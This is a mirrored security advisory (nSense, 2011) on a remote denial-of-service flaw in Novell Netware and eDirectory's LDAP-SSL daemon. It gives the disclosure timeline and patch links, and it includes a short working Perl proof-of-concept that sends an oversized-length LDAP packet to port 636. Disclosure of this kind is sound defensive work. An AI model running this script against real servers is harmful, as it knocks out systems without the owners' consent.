首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Novell Netware eDirectory DoS Vulnerability
来源:http://www.nsense.dk 作者:nSense 发布时间:2011-05-17  
nSense Vulnerability Research Security Advisory NSENSE-2011-002
---------------------------------------------------------------
 
Affected Vendor:    Novell
Affected Product:   Netware, eDirectory
Platform:           Netware / Linux
Impact:             Remote Denial of Service
Vendor response:    Patch
CVE:                None
Credit:             Knud / nSense
 
Technical details
---------------------------------------------------------------
It is possible to cause a Denial of Service in Novell's
LDAP-SSL daemon due to the system blindly allocating a
user-specified amount of memory. Exploiting the issue on a
Netware system will cause a system-wide DoS condition. A script
for replicating the issue is included below:
 
#!/usr/bin/perl
# usage: ./novell.pl 10.0.0.1 0x41424344
use IO::Socket::SSL;
$socket = new IO::Socket::SSL(Proto=>"tcp",
PeerAddr=>$ARGV[0], PeerPort=>636);
die "unable to connect to $host:$port ($!)\n" unless $socket;
print $socket "\x30\x84" . pack("N",hex($ARGV[1])) .
"\x02\x01\x01\x60\x09\x02\x01\x03\x04\x02\x44\x4e\x80\x00" ;
close $socket; print "done\n";
 
 
Timeline:
20100819     Contacted vendor, supplied PoC
20100825     Vendor acknowledges receipt of information
20100826     Vendor creates ticket, SR # 10645215982
20100922     nSense requests status update
20100928     Vendor responds that a fix is being tested
20101109     nSense requests status update
20101112     nSense requests status update
20101112     Vendor responds, fix is still being tested
20101221     nSense requests status update
20101227     Vendor responds, patch is being built
20110124     nSense requests status update
20110127     Vendor responds, patches planned for medio feb 2011
20110320     nSense requests status update
20110329     nSense requests status update
20110329     Vendor responds, other issues discovered in code
20110409     Vendor responds, patch issued for eDirectory
20110409     nSense asks for netware patch date
20110419     nSense asks for netware patch date
20110427     nSense asks for netware patch date
20110504     Vendor responds, netware patch released
 
Solution
Install the vendor supplied patch.
Netware:    http://download.novell.com/Download?buildid=bXPFv5btgsA~
eDirectory: http://download.novell.com/Download?buildid=-KMoN4RVaCQ~
 
Links:
http://www.nsense.fi                       http://www.nsense.dk
 
 
 
$$s$$$$s.   ,s$$$$s   ,S$$$$$s.  $$s$$$$s.   ,s$$$$s   ,S$$$$$s.
$$$  `$$$  ($$(       $$$  `$$$  $$$  `$$$  ($$(       $$$  `$$$
$$$   $$$    `^$$s.   $$$$$$$$$  $$$   $$$    `^$$s.   $$$$$$$$$
$$$   $$$       )$$)  $$$        $$$   $$$       )$$)  $$$
$$$   $$$  ^$$$$$$7    `7$$$$$P  $$$   $$$  ^$$$$$$7   `7$$$$$P
 
               D r i v e n   b y   t h e   c h a l l e n g e _
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·CoolPlayer Portable 2.19.2 Buf
·AVS Ringtone Maker 1.6.1 (.au)
·Steam Software Denial of Servi
·AVS Ringtone Maker 1.6.1 - SEH
·XtreamerPRO Media-player Multi
·Vmware vSphere Management Assi
·Winamp 5.61 'in_midi' componen
·DreamBox DM500(+) Arbitrary Fi
·Chasys Media Player Buffer Ove
·Win32 VB6_vbaExceptHandler - S
·Adobe Audition 3.0 (build 7283
·A-PDF Wav to MP3 Converter v 1
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved